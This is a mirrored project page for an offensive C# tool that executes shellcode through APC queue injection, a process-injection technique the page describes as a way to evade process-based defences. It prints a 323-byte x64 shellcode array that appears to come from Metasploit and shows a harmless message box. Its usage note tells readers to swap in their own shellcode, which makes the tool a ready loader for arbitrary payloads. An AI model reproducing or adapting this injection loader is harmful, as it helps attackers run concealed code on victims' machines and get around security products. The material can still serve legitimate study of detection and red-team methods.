Docker>> APC_ShellcodeExecution_CSharp>> 返回
项目作者: Kara-4search

项目描述 :
Shellcode Load or execute via "APC technic"
高级语言: C#
项目地址: git://github.com/Kara-4search/APC_ShellcodeExecution_CSharp.git


APC_ShellcodeExecution_CSharp

blog link: may not gonna update

  • Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.
  • APC injection is a method of executing arbitrary code in the address space of a separate live process.
  • QueueUserAPC function, Adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread.
  • Only tested in Win10/x64, works fine, It should works on x86.
  • The shellcode below is a messagebox
    1.           /* MessageBox */
    2.           byte[] buf1 = new byte[323] {
    3.               0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
    4.               0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
    5.               0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
    6.               0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
    7.               0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
    8.               0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
    9.               0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
    10.               0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
    11.               0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
    12.               0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
    13.               0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
    14.               0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
    15.               0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
    16.               0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
    17.               0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
    18.               0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
    19.               0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
    20.               0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
    21.               0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
    22.               0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,
    23.               0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,
    24.               0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 
    25.           };

Usage

  1. Just replace the shellcode with your own
  • Messagebox
    avatar

TO-DO list

  • None

Update history

  • None

Reference link:

  1. 1. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html
  2. 2. https://idiotc4t.com/code-and-dll-process-injection/apc-and-nttestalert-code-execute
  3. 3. https://idiotc4t.com/code-and-dll-process-injection/apc-injection
  4. 4. https://idiotc4t.com/code-and-dll-process-injection/apc-thread-hijack
  5. 5. https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert
  6. 6. https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
  7. 7. https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection
  8. 8. https://attack.mitre.org/techniques/T1055/004/
  9. 9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc